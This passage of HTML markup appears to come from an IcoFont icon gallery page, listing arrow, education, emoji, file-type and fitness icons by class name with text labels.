					<i class="icofont-dotted-up"></i>
				</div> 
				<span> dotted-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-double-left"></i>
				</div> 
				<span> double-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-double-right"></i>
				</div> 
				<span> double-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-expand-alt"></i>
				</div> 
				<span> expand-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-down"></i>
				</div> 
				<span> hand-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drag"></i>
				</div> 
				<span> hand-drag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drag1"></i>
				</div> 
				<span> hand-drag1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drag2"></i>
				</div> 
				<span> hand-drag2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-alt-down"></i>
				</div> 
				<span> hand-drawn-alt-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-alt-left"></i>
				</div> 
				<span> hand-drawn-alt-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-alt-right"></i>
				</div> 
				<span> hand-drawn-alt-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-alt-up"></i>
				</div> 
				<span> hand-drawn-alt-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-down"></i>
				</div> 
				<span> hand-drawn-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-left"></i>
				</div> 
				<span> hand-drawn-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-right"></i>
				</div> 
				<span> hand-drawn-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-drawn-up"></i>
				</div> 
				<span> hand-drawn-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-grippers"></i>
				</div> 
				<span> hand-grippers </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-left"></i>
				</div> 
				<span> hand-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-right"></i>
				</div> 
				<span> hand-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hand-up"></i>
				</div> 
				<span> hand-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-line-block-down"></i>
				</div> 
				<span> line-block-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-line-block-left"></i>
				</div> 
				<span> line-block-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-line-block-right"></i>
				</div> 
				<span> line-block-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-line-block-up"></i>
				</div> 
				<span> line-block-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-long-arrow-down"></i>
				</div> 
				<span> long-arrow-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-long-arrow-left"></i>
				</div> 
				<span> long-arrow-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-long-arrow-right"></i>
				</div> 
				<span> long-arrow-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-long-arrow-up"></i>
				</div> 
				<span> long-arrow-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-collapse"></i>
				</div> 
				<span> rounded-collapse </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-double-left"></i>
				</div> 
				<span> rounded-double-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-double-right"></i>
				</div> 
				<span> rounded-double-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-down"></i>
				</div> 
				<span> rounded-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-expand"></i>
				</div> 
				<span> rounded-expand </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-left-down"></i>
				</div> 
				<span> rounded-left-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-left-up"></i>
				</div> 
				<span> rounded-left-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-left"></i>
				</div> 
				<span> rounded-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-right-down"></i>
				</div> 
				<span> rounded-right-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-right-up"></i>
				</div> 
				<span> rounded-right-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-right"></i>
				</div> 
				<span> rounded-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rounded-up"></i>
				</div> 
				<span> rounded-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-bubble-down"></i>
				</div> 
				<span> scroll-bubble-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-bubble-left"></i>
				</div> 
				<span> scroll-bubble-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-bubble-right"></i>
				</div> 
				<span> scroll-bubble-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-bubble-up"></i>
				</div> 
				<span> scroll-bubble-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-double-down"></i>
				</div> 
				<span> scroll-double-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-double-left"></i>
				</div> 
				<span> scroll-double-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-double-right"></i>
				</div> 
				<span> scroll-double-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-double-up"></i>
				</div> 
				<span> scroll-double-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-down"></i>
				</div> 
				<span> scroll-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-left"></i>
				</div> 
				<span> scroll-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-long-down"></i>
				</div> 
				<span> scroll-long-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-long-left"></i>
				</div> 
				<span> scroll-long-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-long-right"></i>
				</div> 
				<span> scroll-long-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-long-up"></i>
				</div> 
				<span> scroll-long-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-right"></i>
				</div> 
				<span> scroll-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-scroll-up"></i>
				</div> 
				<span> scroll-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-down"></i>
				</div> 
				<span> simple-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-left-down"></i>
				</div> 
				<span> simple-left-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-left-up"></i>
				</div> 
				<span> simple-left-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-left"></i>
				</div> 
				<span> simple-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-right-down"></i>
				</div> 
				<span> simple-right-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-right-up"></i>
				</div> 
				<span> simple-right-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-right"></i>
				</div> 
				<span> simple-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-up"></i>
				</div> 
				<span> simple-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-square-down"></i>
				</div> 
				<span> square-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-square-left"></i>
				</div> 
				<span> square-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-square-right"></i>
				</div> 
				<span> square-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-square-up"></i>
				</div> 
				<span> square-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stylish-down"></i>
				</div> 
				<span> stylish-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stylish-left"></i>
				</div> 
				<span> stylish-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stylish-right"></i>
				</div> 
				<span> stylish-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stylish-up"></i>
				</div> 
				<span> stylish-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-swoosh-down"></i>
				</div> 
				<span> swoosh-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-swoosh-left"></i>
				</div> 
				<span> swoosh-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-swoosh-right"></i>
				</div> 
				<span> swoosh-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-swoosh-up"></i>
				</div> 
				<span> swoosh-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thin-double-left"></i>
				</div> 
				<span> thin-double-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thin-double-right"></i>
				</div> 
				<span> thin-double-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thin-down"></i>
				</div> 
				<span> thin-down </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thin-left"></i>
				</div> 
				<span> thin-left </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thin-right"></i>
				</div> 
				<span> thin-right </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-thin-up"></i>
				</div> 
				<span> thin-up </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-abc"></i>
				</div> 
				<span> abc </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-atom"></i>
				</div> 
				<span> atom </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-award"></i>
				</div> 
				<span> award </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-bell-alt"></i>
				</div> 
				<span> bell-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-black-board"></i>
				</div> 
				<span> black-board </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-book-alt"></i>
				</div> 
				<span> book-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-book"></i>
				</div> 
				<span> book </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-brainstorming"></i>
				</div> 
				<span> brainstorming </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-certificate-alt-1"></i>
				</div> 
				<span> certificate-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-certificate-alt-2"></i>
				</div> 
				<span> certificate-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-certificate"></i>
				</div> 
				<span> certificate </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-education"></i>
				</div> 
				<span> education </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-electron"></i>
				</div> 
				<span> electron </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-fountain-pen"></i>
				</div> 
				<span> fountain-pen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-globe-alt"></i>
				</div> 
				<span> globe-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-graduate-alt"></i>
				</div> 
				<span> graduate-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-graduate"></i>
				</div> 
				<span> graduate </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-group-students"></i>
				</div> 
				<span> group-students </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hat-alt"></i>
				</div> 
				<span> hat-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-hat"></i>
				</div> 
				<span> hat </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-instrument"></i>
				</div> 
				<span> instrument </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-lamp-light"></i>
				</div> 
				<span> lamp-light </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-medal"></i>
				</div> 
				<span> medal </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-microscope-alt"></i>
				</div> 
				<span> microscope-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-microscope"></i>
				</div> 
				<span> microscope </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-paper"></i>
				</div> 
				<span> paper </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen-alt-4"></i>
				</div> 
				<span> pen-alt-4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pen-nib"></i>
				</div> 
				<span> pen-nib </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-pencil-alt-5"></i>
				</div> 
				<span> pencil-alt-5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-quill-pen"></i>
				</div> 
				<span> quill-pen </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-read-book-alt"></i>
				</div> 
				<span> read-book-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-read-book"></i>
				</div> 
				<span> read-book </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-school-bag"></i>
				</div> 
				<span> school-bag </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-school-bus"></i>
				</div> 
				<span> school-bus </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-student-alt"></i>
				</div> 
				<span> student-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-student"></i>
				</div> 
				<span> student </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-teacher"></i>
				</div> 
				<span> teacher </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-test-bulb"></i>
				</div> 
				<span> test-bulb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-test-tube-alt"></i>
				</div> 
				<span> test-tube-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-university"></i>
				</div> 
				<span> university </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-angry"></i>
				</div> 
				<span> angry </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-astonished"></i>
				</div> 
				<span> astonished </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-confounded"></i>
				</div> 
				<span> confounded </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-confused"></i>
				</div> 
				<span> confused </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-crying"></i>
				</div> 
				<span> crying </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dizzy"></i>
				</div> 
				<span> dizzy </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-expressionless"></i>
				</div> 
				<span> expressionless </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-heart-eyes"></i>
				</div> 
				<span> heart-eyes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-laughing"></i>
				</div> 
				<span> laughing </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-nerd-smile"></i>
				</div> 
				<span> nerd-smile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-open-mouth"></i>
				</div> 
				<span> open-mouth </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rage"></i>
				</div> 
				<span> rage </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-rolling-eyes"></i>
				</div> 
				<span> rolling-eyes </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-sad"></i>
				</div> 
				<span> sad </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-simple-smile"></i>
				</div> 
				<span> simple-smile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-slightly-smile"></i>
				</div> 
				<span> slightly-smile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-smirk"></i>
				</div> 
				<span> smirk </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-stuck-out-tongue"></i>
				</div> 
				<span> stuck-out-tongue </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-wink-smile"></i>
				</div> 
				<span> wink-smile </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-worried"></i>
				</div> 
				<span> worried </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-alt"></i>
				</div> 
				<span> file-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-audio"></i>
				</div> 
				<span> file-audio </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-avi-mp4"></i>
				</div> 
				<span> file-avi-mp4 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-bmp"></i>
				</div> 
				<span> file-bmp </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-code"></i>
				</div> 
				<span> file-code </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-css"></i>
				</div> 
				<span> file-css </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-document"></i>
				</div> 
				<span> file-document </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-eps"></i>
				</div> 
				<span> file-eps </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-excel"></i>
				</div> 
				<span> file-excel </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-exe"></i>
				</div> 
				<span> file-exe </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-file"></i>
				</div> 
				<span> file-file </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-flv"></i>
				</div> 
				<span> file-flv </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-gif"></i>
				</div> 
				<span> file-gif </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-html5"></i>
				</div> 
				<span> file-html5 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-image"></i>
				</div> 
				<span> file-image </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-iso"></i>
				</div> 
				<span> file-iso </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-java"></i>
				</div> 
				<span> file-java </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-javascript"></i>
				</div> 
				<span> file-javascript </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-jpg"></i>
				</div> 
				<span> file-jpg </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-midi"></i>
				</div> 
				<span> file-midi </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-mov"></i>
				</div> 
				<span> file-mov </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-mp3"></i>
				</div> 
				<span> file-mp3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-pdf"></i>
				</div> 
				<span> file-pdf </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-php"></i>
				</div> 
				<span> file-php </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-png"></i>
				</div> 
				<span> file-png </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-powerpoint"></i>
				</div> 
				<span> file-powerpoint </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-presentation"></i>
				</div> 
				<span> file-presentation </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-psb"></i>
				</div> 
				<span> file-psb </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-psd"></i>
				</div> 
				<span> file-psd </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-python"></i>
				</div> 
				<span> file-python </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-ruby"></i>
				</div> 
				<span> file-ruby </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-spreadsheet"></i>
				</div> 
				<span> file-spreadsheet </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-sql"></i>
				</div> 
				<span> file-sql </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-svg"></i>
				</div> 
				<span> file-svg </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-text"></i>
				</div> 
				<span> file-text </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-tiff"></i>
				</div> 
				<span> file-tiff </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-video"></i>
				</div> 
				<span> file-video </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-wave"></i>
				</div> 
				<span> file-wave </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-wmv"></i>
				</div> 
				<span> file-wmv </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-word"></i>
				</div> 
				<span> file-word </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-file-zip"></i>
				</div> 
				<span> file-zip </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cycling-alt"></i>
				</div> 
				<span> cycling-alt </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-cycling"></i>
				</div> 
				<span> cycling </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dumbbell"></i>
				</div> 
				<span> dumbbell </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-dumbbells"></i>
				</div> 
				<span> dumbbells </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gym-alt-1"></i>
				</div> 
				<span> gym-alt-1 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gym-alt-2"></i>
				</div> 
				<span> gym-alt-2 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gym-alt-3"></i>
				</div> 
				<span> gym-alt-3 </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-gym"></i>
				</div> 
				<span> gym </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-muscle-weight"></i>
				</div> 
				<span> muscle-weight </span>
			</div>
		</li>
		
		<li>
			<div class="icon-holder">
				<div class="icon"> 
					<i class="icofont-muscle"></i>
				</div> 
